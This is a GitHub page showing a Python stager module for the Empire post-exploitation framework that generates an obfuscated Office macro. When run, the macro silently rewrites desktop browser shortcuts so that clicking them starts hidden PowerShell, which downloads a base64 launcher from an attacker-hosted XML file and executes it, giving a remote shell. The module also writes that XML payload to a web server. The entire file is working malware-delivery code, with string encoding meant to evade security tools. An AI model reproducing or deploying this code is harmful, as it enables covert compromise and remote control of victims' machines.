forked from 4po/BackdoorObfuscated
-
Notifications
You must be signed in to change notification settings - Fork 0
/
BackdoorObfuscated.py
213 lines (179 loc) · 12 KB
/
BackdoorObfuscated.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
import string, random
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'BackdoorLnkMacro',
'Author': ['4po (@apo#1337)'],
'Description': ('Generates a macro that backdoors .lnk files on the users desktop, backdoored lnk files in turn attempt to download & execute an empire launcher when the user clicks on them. Usage: Two files will be spawned from this, a macro that should be placed in an office document and an xml that should be placed on a web server accessible by the remote system. By default this xml is written to /var/www/html, which is the webroot on debian-based systems such as kali.'),
'Comments': ['Two-stage macro attack vector used for bypassing tools that perform relational analysis and flag / block process launches from unexpected programs, such as office. The initial run of the macro is pure vbscript (no child processes spawned) and will backdoor shortcuts on the desktop to do a direct run of powershell. The second step occurs when the user clicks on the shortcut, the powershell download stub that runs will attempt to download & execute an empire launcher from an xml file hosted on a pre-defined webserver, which will in turn grant a full shell. Credits to @harmj0y and @enigma0x3 for designing the macro stager that this was originally based on.']
}
xmlVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(5,9)))
# toute option nécessaire au stager, paramétrable pendant l'exécution
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the launcher to generate.',
'Required' : True,
'Value' : 'powershell'
},
'TargetEXEs' : {
'Description' : 'Will backdoor .lnk files pointing to selected executables (do not include .exe extension), enter a comma seperated list of target exe names - ex. iexplore,firefox,chrome',
'Required' : True,
'Value' : 'iexplore,firefox,chrome'
},
'XmlUrl' : {
'Description' : 'remotely-accessible URL to access the XML containing launcher code.',
'Required' : True,
'Value' : "http://" + helpers.lhost() + "/"+xmlVar+".xml"
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'XmlOutFile' : {
'Description' : 'Local path + file to output xml to.',
'Required' : True,
'Value' : '/var/www/html/'+xmlVar+'.xml'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# enregistrer une copie de l'objet mainMenu pour accéder à une fonctionnalité externe
# comme les auditeurs / les agents de traitement / etc.
self.mainMenu = mainMenu
for param in params:
# Le format des paramètres est [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
#méthode de codage utilisée pour obscurcir les chaînes de caractères placées dans la macro
@staticmethod
def encoder(strIn):
encStr = []
randOffset = random.randint(2,7)
junkChars = random.randint(2,30)
print("%02x" % junkChars)
encStr.append(str(randOffset))
encStr.append("%02x" % junkChars)
encStr.append(''.join(random.choice(string.digits[2:9]) for _ in range (junkChars)))
for c in strIn:
encStr.append(format(ord(c)-randOffset, "x"))
encStr.append(str(random.randint(2,7)))
return ''.join(encStr)
def generate(self):
# définir les variables
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
targetEXE = self.options['TargetEXEs']['Value']
XmlPath = self.options['XmlUrl']['Value']
XmlOut = self.options['XmlOutFile']['Value']
targetEXE = targetEXE.split(',')
targetEXE = filter(None,targetEXE)
fncDecryptName = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,15)))
shellVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
lnkVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
fsoVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
folderVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
fileVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
encStrVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
tempStrVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
shiftVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
offsetVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
blockVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10,25)))
# générer le lanceur
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
launcher = launcher.split(" ")[-1]
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
#construire la macro - recherche tous les fichiers .lnk sur le bureau, tout ce qu'il trouve sera inspecté pour déterminer s'il correspond à l'un des noms d'exe ciblés
macro = "Sub Auto_Close()\n"
#macro += "Dim " + shellVar + " As Object, " + lnkVar + " as Object, " + blockVar + " as String\n"
macro += "Set " + shellVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder("Wscript.Shell") + "\"))\n"
macro += "Set " + fsoVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder("Scripting.FileSystemObject") + "\"))\n"
macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(\"desktop\"))\n"
macro += "For Each " + fileVar + " In " + folderVar + ".Files\n"
macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n"
macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(\"desktop\") & \"\\\" & " + fileVar + ".name)\n"
macro += "If("
for i, item in enumerate(targetEXE):
if i:
macro += (' or ')
macro += "InStr(Lcase(" + lnkVar + ".targetPath), " + fncDecryptName + "(\"" + self.encoder(targetEXE[i].strip().lower() + ".") + "\"))"
macro += ") Then\n"
#écrire et obscurcir la commande qui sera exécutée en cliquant sur le bouton "backdoored .lnk
launchString1 = " -w hidden -nop -command \"[System.Diagnostics.Process]::Start(\'"
launchString2 = "& " + lnkVar + ".targetPath & "
launchString3 = "\');$u=New-Object -comObject wscript.shell;Get-ChildItem -Path $env:USERPROFILE\desktop -Filter *.lnk | foreach { $lnk = $u.createShortcut($_.FullName); if($lnk.arguments -like \'*xml.xmldocument*\') {$start = $lnk.arguments.IndexOf(\'\'\'\') + 1; $result = $lnk.arguments.Substring($start, $lnk.arguments.IndexOf(\'\'\'\', $start) - $start );$lnk.targetPath = $result; $lnk.Arguments = \'\'; $lnk.Save()}};$b = New-Object System.Xml.XmlDocument;$b.Load(\'"
launchString4 = "\');[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\""
launchString1 = helpers.randomize_capitalization(launchString1)
launchString2 = helpers.randomize_capitalization(launchString2)
launchString3 = helpers.randomize_capitalization(launchString3)
launchString4 = helpers.randomize_capitalization(launchString4)
#le script encodé devient plus long, cet extrait réduit les données à une taille plus gérable, empêche vbscript de faire des erreurs en raison d'une ligne de plus de 1023 caractères
chunks = list(helpers.chunks(self.encoder(launchString3 + XmlPath + launchString4), random.randint(600,750)))
macro += blockVar + " = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
macro += blockVar + " = " + blockVar + " + \"" + str(chunk) + "\"\n"
#une partie de la macro qui modifie effectivement les fichiers LNK sur le bureau, définit l'iconlocation de lnk mis à jour vers l'ancien chemin cible, les args vers notre code de lancement, et la cible vers powerhell afin que nous puissions l'appeler directement
macro += lnkVar +".IconLocation = " + lnkVar + ".targetpath\n"
launchString = fncDecryptName + "(\"" + self.encoder(launchString1) + "\")" + launchString2 + fncDecryptName + "(" + blockVar + ")\n"
macro += lnkVar + ".arguments = " + launchString
macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & "+ fncDecryptName +"(\""+self.encoder(":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") + "\")\n"
macro += lnkVar + ".save\n"
macro += "end if\n"
macro += "end if\n"
macro += "next " + fileVar + "\n"
macro += "End Sub\n\n"
#de-obfuscation écrite dans la macro, celle-ci est appelée au moment de l'exécution de la macro et reconvertit le texte obscurci en ascii
macro += "Function " + fncDecryptName + "(" + encStrVar + ") as String\n"
macro += "Dim " + tempStrVar + ", " + shiftVar + ", " + offsetVar + "\n"
macro += shiftVar + " = CLng(\"&H\" & Left(" + encStrVar + ", 1))\n"
macro += offsetVar + " = CLng(\"&H\" & Mid(" + encStrVar + ", 2, 2)) + 4\n"
macro += "For i = " + offsetVar +" To Len(" + encStrVar + ") Step 3\n"
macro += tempStrVar + " = " + tempStrVar + " & Chr(CLng(\"&H\" & Mid(" + encStrVar + ",i,2)) + " + shiftVar + ")\n"
macro += "Next\n"
macro += fncDecryptName + " = " + tempStrVar + "\n"
macro += "End Function"
#écrit un stager intermédiaire XML sur le disque
print("Writing xml...\n")
f = open(XmlOut,"w")
f.write("<?xml version=\"1.0\"?>\n")
f.write("<command>\n")
f.write("\t<a>\n")
f.write("\t<execute>"+launcher+"</execute>\n")
f.write("\t</a>\n")
f.write("</command>\n")
print("xml written to " + XmlOut + " please remember this file must be accessible by the target at this url: " + XmlPath + "\n")
return macro